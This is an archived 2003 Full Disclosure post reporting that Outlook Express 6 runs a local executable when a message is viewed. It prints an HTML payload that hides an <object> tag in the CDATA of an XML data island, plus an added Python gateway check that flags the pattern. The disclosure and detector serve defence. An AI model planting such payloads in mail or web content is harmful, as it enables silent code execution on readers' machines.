Full Disclosure mailing list archives
O UTLO OK EXP RE SS 6 .00 : broken
From: "http-equiv () excite com" <http-equiv () malware com>
Date: Sat, 22 Feb 2003 14:41:09 -0000
Saturday, February 22, 2003

Technical silent delivery and installation of an executable no client input other than reading an email or viewing a newsgroup message.

Outlook Express 6.00 SP1 Cumulative Pack 1 2 3 4 whatever.

This should not be possible. When viewing an email message or a newsgroup message, Outlook Express creates a temp file in the Internet Explorer cache. From here security should be governed by Internet Explorer's security settings.

In an html email with internet zone applied, this will not function:

<object classid="clsid:11111111-1111-1111-1111" codebase="C:\WINDOWS\FTP.EXE"></object>

[screen shot: http://www.malware.com/tsktsk.png 11KB]

In an html email message or newsgroup message with internet zone applied this will function:

<xml id=oExec>
<security><exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111" codebase="C:\WINDOWS\FTP.EXE"></object>]]></exploit></security></xml>

<SPAN dataFld=exploit dataFormatAs=html dataSrc=#oExec></SPAN>

courtesy of: http://sec.greymagic.com/adv/gm001-ie/

[screen shot: http://www.malware.com/tsktsktsk.png 11KB]

NOTE: that default installations of Outlook Express 6.00 are with restricted zone applied. However there still remain many 'happy people' out there that enjoy their html mail messages and html newsgroup messages, and coupling the above with any one of a million other unsolved problems now and in the future with Internet Explorer and Outlook Express, including a new http://www.malware.com/stench.html we are back in business.

Notes: This is supposed to be patched:

http://microsoft.com/technet/security/bulletin/MS02-015.asp 28 March 2002

Keywords: experts Academic Advisory Board Think Tank security concepts

--
http://www.malware.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
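Added example, not part of the original post: a Python check for a mail or news gateway that flags an `<object>` whose codebase points at a local file, both when it appears directly in the body and when it is hidden in a CDATA section of an XML data island that another element binds with dataFormatAs=html. The function and constant names are assumptions of this example; the two sample bodies are the snippets quoted in the post.

```python
import re
from html.parser import HTMLParser

# codebase values that name a local resource: drive path, UNC path, file: URL
LOCAL_CODEBASE = re.compile(r'^\s*(?:[a-z]:[\\/]|\\\\|file:)', re.I)
ISLAND = re.compile(r'<xml\b([^>]*)>(.*?)</xml\s*>', re.I | re.S)
CDATA = re.compile(r'<!\[CDATA\[(.*?)\]\]>', re.S)
ID_ATTR = re.compile(r'\bid\s*=\s*["\']?([^\s"\'>]+)', re.I)

# Sample bodies: the two snippets quoted in the post above.
SAMPLE_DIRECT = r'<object classid="clsid:11111111-1111-1111-1111" codebase="C:\WINDOWS\FTP.EXE"></object>'
SAMPLE_BOUND = (r'<xml id=oExec> <security><exploit> <![CDATA[ <object id="oFile" '
                r'classid="clsid:11111111-1111-1111-1111" codebase="C:\WINDOWS\FTP.EXE">'
                r'</object>]]></exploit></security></xml> '
                r'<SPAN dataFld=exploit dataFormatAs=html dataSrc=#oExec></SPAN>')

class _TagScan(HTMLParser):
    """Collects local-codebase <object> tags and HTML-formatted data bindings."""
    def __init__(self):
        super().__init__()
        self.local_objects = []   # codebase values pointing at local files
        self.html_bindings = []   # island ids referenced with dataFormatAs=html

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}   # HTMLParser lowercases names
        if tag == "object" and LOCAL_CODEBASE.match(a.get("codebase", "")):
            self.local_objects.append(a["codebase"])
        if a.get("dataformatas", "").lower() == "html" and a.get("datasrc", "").startswith("#"):
            self.html_bindings.append(a["datasrc"][1:].lower())

def _scan(fragment):
    p = _TagScan()
    p.feed(fragment)
    p.close()
    return p

def scan_html_mail(body):
    """Return (finding, codebase) tuples for one HTML message body."""
    islands = {}
    for attrs, inner in ISLAND.findall(body):
        m = ID_ATTR.search(attrs)
        # Markup inside CDATA is inert text until a binding renders it as HTML.
        hidden = " ".join(CDATA.findall(inner))
        islands[(m.group(1) if m else "").lower()] = _scan(hidden).local_objects
    outer = _scan(ISLAND.sub("", body))        # body with the islands cut out
    findings = [("direct-object", cb) for cb in outer.local_objects]
    for island_id in outer.html_bindings:
        findings += [("bound-island-object", cb) for cb in islands.get(island_id, [])]
    return findings
```

The check only covers CDATA-wrapped markup, the form shown in the post; a gateway that strips `<xml>` islands and data-binding attributes outright avoids having to enumerate encodings.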